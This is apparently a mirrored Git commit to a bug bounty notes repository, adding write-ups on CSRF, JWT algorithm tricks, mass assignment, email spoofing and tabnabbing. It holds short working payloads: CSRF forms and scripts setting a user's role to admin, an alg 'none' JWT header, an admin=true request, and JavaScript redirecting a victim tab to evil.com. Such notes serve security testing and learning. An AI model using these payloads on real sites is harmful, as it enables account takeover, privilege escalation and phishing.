mirror of
https://github.com/daffainfo/AllAboutBugBounty.git
synced 2024-12-18 18:36:12 +00:00
Added 4 tips to misc folders
This commit is contained in:
parent
8c337501d1
commit
614ff9f093
@ -1,4 +1,45 @@
|
||||
# Bypass CSRF Token
|
||||
# Cross Site Request Forgery (CSRF)
|
||||
## Introduction
|
||||
Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated
|
||||
|
||||
## How to Find
|
||||
|
||||
1. HTML GET Method
|
||||
|
||||
```html
|
||||
<a href="http://www.example.com/api/setusername?username=uname">Click Me</a>
|
||||
```
|
||||
|
||||
2. HTML POST Method
|
||||
|
||||
```html
|
||||
<form action="http://www.example.com/api/setusername" enctype="text/plain" method="POST">
|
||||
<input name="username" type="hidden" value="uname" />
|
||||
<input type="submit" value="Submit Request" />
|
||||
</form>
|
||||
```
|
||||
|
||||
3. JSON GET Method
|
||||
```html
|
||||
<script>
|
||||
var xhr = new XMLHttpRequest();
|
||||
xhr.open("GET", "http://www.example.com/api/currentuser");
|
||||
xhr.send();
|
||||
</script>
|
||||
```
|
||||
|
||||
4. JSON POST Method
|
||||
```html
|
||||
<script>
|
||||
var xhr = new XMLHttpRequest();
|
||||
xhr.open("POST", "http://www.example.com/api/setrole");
|
||||
xhr.withCredentials = true;
|
||||
xhr.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
|
||||
xhr.send('{"role":admin}');
|
||||
</script>
|
||||
```
|
||||
|
||||
## Bypass CSRF Token
|
||||
1. Change single character
|
||||
```
|
||||
POST /register HTTP/1.1
|
@ -2,8 +2,8 @@
|
||||
|
||||
## **Introduction**
|
||||
Source code intended to be kept server-side can sometimes end up being disclosed to users. Such code may contain sensitive information such as database passwords and secret keys, which may help malicious users formulate attacks against the application.
|
||||
## **How to Find**
|
||||
|
||||
## **How to Find**
|
||||
1. Exposed Git folder
|
||||
```
|
||||
https://site.com/.git
|
||||
|
16
Misc/Email Spoofing.md
Normal file
16
Misc/Email Spoofing.md
Normal file
@ -0,0 +1,16 @@
|
||||
# Email Spoofing
|
||||
## Introduction
|
||||
Email spoofing is a technique used in spam and phishing attacks to trick users into thinking a message came from a person or entity they either know or can trust. In spoofing attacks, the sender forges email headers so that client software displays the fraudulent sender address, which most users take at face value.
|
||||
|
||||
## How to Find
|
||||
1. Check the SPF records, if the website don't have a SPF record, the website must be vulnerable to email spoofing
|
||||
```
|
||||
v=spf1 include:_spf.google.com ~all
|
||||
```
|
||||
2. Check the DMARC records, if the website don't have a DMARC record or the value of tag policy is `none`, the website must be vulnerable to email spoofing
|
||||
```
|
||||
v=DMARC1; p=none; rua=mailto:dmarc@yourdomain.com
|
||||
```
|
||||
|
||||
Reference:
|
||||
- [Hackerone #1071521](https://hackerone.com/reports/1071521)
|
22
Misc/JWT Vulnerabilities.md
Normal file
22
Misc/JWT Vulnerabilities.md
Normal file
@ -0,0 +1,22 @@
|
||||
# JWT Vulnerabilities
|
||||
## Introduction
|
||||
JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object.
|
||||
|
||||
## How to Exploit
|
||||
1. Modify the algorithm to "none" algorithm
|
||||
```
|
||||
{
|
||||
"alg": "none",
|
||||
"typ": "JWT"
|
||||
}
|
||||
```
|
||||
2. Modify the algorithm RS256 to HS256
|
||||
|
||||
If you change the algorithm from RS256 to HS256, the backend code uses the public key as the secret key and then uses the HS256 algorithm to verify the signature.
|
||||
|
||||
3. Bruteforce HS256
|
||||
|
||||
the HS256 key strength is weak, it can be directly brute-forced, such as using the secret string as a key in the PyJWT library sample code.
|
||||
|
||||
Reference:
|
||||
- [Hacking JSON Web Token (JWT)](https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6)
|
33
Misc/Mass Assignment.md
Normal file
33
Misc/Mass Assignment.md
Normal file
@ -0,0 +1,33 @@
|
||||
# Mass Assignment Attack
|
||||
## Introduction
|
||||
Occurs when an app allows a user to manually add parameters in an HTTP Request & the app process value of these parameters when processing the HTTP Request & it affects the response that is returned to the user. Usually occurs in Ruby on Rails / NodeJS
|
||||
|
||||
## How to Exploit
|
||||
- Normal request
|
||||
```
|
||||
POST /editdata
|
||||
Host: vuln.com
|
||||
|
||||
username=daffa
|
||||
```
|
||||
```
|
||||
HTTP/1.1 200 OK
|
||||
...
|
||||
|
||||
username=daffa&admin=false
|
||||
```
|
||||
|
||||
- Modified Request
|
||||
```
|
||||
POST /editdata
|
||||
Host: vuln.com
|
||||
|
||||
username=daffa&admin=true
|
||||
```
|
||||
|
||||
```
|
||||
HTTP/1.1 200 OK
|
||||
...
|
||||
|
||||
username=daffa&admin=true
|
||||
```
|
23
Misc/Tabnabbing.md
Normal file
23
Misc/Tabnabbing.md
Normal file
@ -0,0 +1,23 @@
|
||||
# Tabnabbing
|
||||
## Introduction
|
||||
When you open a link in a new tab ( target="_blank" ), the page that opens in a new tab can access the initial tab and change it's location using the window.opener property.
|
||||
|
||||
## How to Find
|
||||
```html
|
||||
<a href="..." target="_blank" rel="" />
|
||||
|
||||
<a href="..." target="_blank" />
|
||||
```
|
||||
|
||||
## How to Exploit
|
||||
1. Attacker posts a link to a website under his control that contains the following JS code:
|
||||
```html
|
||||
<html>
|
||||
<script>
|
||||
if (window.opener) window.opener.parent.location.replace('http://evil.com');
|
||||
if (window.parent != window) window.parent.location.replace('http://evil.com');
|
||||
</script>
|
||||
</html>
|
||||
```
|
||||
2. He tricks the victim into visiting the link, which is opened in the browser in a new tab.
|
||||
3. At the same time the JS code is executed and the background tab is redirected to the website evil.com, which is most likely a phishing website.
|
@ -3,6 +3,7 @@ These are my bug bounty notes that I have gathered from various sources, you can
|
||||
|
||||
## List
|
||||
- [Business Logic Errors](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Business%20Logic%20Errors.md)
|
||||
- [Cross Site Request Forgery (CSRF)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Request%20Forgery.md)
|
||||
- [Cross Site Scripting (XSS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Scripting.md)
|
||||
- [Denial of Service (DoS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md)
|
||||
- [Exposed Source Code](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md)
|
||||
@ -13,7 +14,6 @@ These are my bug bounty notes that I have gathered from various sources, you can
|
||||
## List Bypass
|
||||
- [Bypass 2FA](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%202FA.md)
|
||||
- [Bypass 403](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20403.md)
|
||||
- [Bypass CSRF](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20CSRF.md)
|
||||
- [Bypass Captcha](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Captcha.md)
|
||||
- [Bypass File Upload](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20File%20Upload.md)
|
||||
- [Bypass Rate Limit](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Rate%20Limit.md)
|
||||
@ -27,7 +27,12 @@ These are my bug bounty notes that I have gathered from various sources, you can
|
||||
|
||||
## Miscellaneous
|
||||
- [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Account%20Takeover.md)
|
||||
- [Broken Link Hijacking](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Broken%20Link%20Hijacking.md)
|
||||
- [Email Spoofing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Email%20Spoofing.md)
|
||||
- [JWT Vulnerabilities](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/JWT%20Vulnerabilities.md)
|
||||
- [Mass Assignment](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Mass%20Assignment.md)
|
||||
- [Password Reset Flaws](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Password%20Reset%20Flaws.md)
|
||||
- [Tabnabbing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Tabnabbing.md)
|
||||
- [Unauthenticated Jira CVE](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Unauthenticated%20Jira%20CVE.md)
|
||||
|
||||
## Reconnaissance
|
||||
|
Loading…
Reference in New Issue
Block a user